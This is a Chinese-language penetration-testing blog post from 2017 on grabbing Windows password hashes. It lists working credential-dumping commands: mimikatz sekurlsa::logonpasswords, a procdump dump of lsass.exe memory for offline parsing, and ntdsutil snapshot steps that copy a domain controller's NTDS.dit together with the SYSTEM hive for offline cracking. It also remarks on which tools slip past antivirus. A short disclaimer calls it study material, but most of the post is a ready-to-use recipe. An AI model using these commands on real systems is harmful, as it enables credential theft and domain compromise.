Marksec's Blog.

内网渗透之hash抓取

字数统计: 646阅读时长: 2 min
2017/12/19 Share

在平时的渗透工作中,对于服务器或者机器的密码的抓取是必须的,不管是明文密码还是hash都对我们后续的安全渗透工作大有裨益,今天我总结几款比较常见的密码抓取工具,供大家一起学习讨论。

WCE

wce是一款基础款工具,其命令也只要wce.exe -w即可,作为基础款工具,局限特别大,面对杀软等根本无法免杀,所以一般使用较少。

MIMIKATZ

mimikatz作为老牌的黑客工具已经升级到2.0的版本了,其中破解密码的功能也是非常方便,但对于杀软的防御也较弱,如果完全控制机器,关闭杀软也可,在msf中也要mimikatz的模块
也可以在渗透中较为方便的获得密码

mimikatz# privilege::debug  //提升权限
mimikatz# sekurlsa::logonpasswords  //抓取密码
## PROCDUMP Procdump是一个轻量级的Sysinternal团队开发的命令行工具, 它的主要目的是监控应用程序的CPU异常动向, 并在此异常时生成crash dump文件, 供研发人员和管理 员确定问题发生的原因,你还可以把它作为生成dump的工具使用在其他的脚本中。因为可以抓取内存生成dump,所以我们可以抓取内存进行分析解密用户名和密码,该工具作为工程师分析CPU的工具,所以杀软等都没有报毒,安全可靠。
管理员身份启动cmd
procdump64.exe -accepteula -ma lsass.exe 文件名(1.dmp) 存放路径
将生成的文件传出后使用mimikatz破解
mimikatz # sekurlsa::minidump 文件名(1.dmp)
mimikatz # sekurlsa::logonPasswords full

域快照

使用域管账号登陆,以管理员身份启动cmd
 执行:
 snapshot
 activate instance ntds
 create
 mount {GUID} #{GUID是一串数字}
 进入c盘根目录,进入域快照内
 将\WINDOWS\NTDS\目录下的NTDS.dit拷贝出
 卸载快照
 unmount {GUID}
 quit
 quit

备份system.hive
 reg save hklm\system c:\system.hive
将上述两个文件拷出,使用QuarksPwDump离线版进行破解(插一句:QuarksPwDump有直接抓取版,但对过杀软程度未可知)
 ntdsutil snapshot "activate instance ntds" create quit quit >> 1.txt
 reg save hklm\system c:\windows\temp\xxsyskeyaa.hive
 ntdsutil snapshot "mount {1.txt中的GUID}" quit quit

对于hash的抓取方法还有powershell等许多方法,在此就不多于赘述了,等学习powershell的时候再详细的写文章,注意本文仅作为交流学习用,请勿用作他处。

*本文为原创,转载请注明出处
CATALOG
  1. 1. WCE
  2. 2. MIMIKATZ
  3. 3. 域快照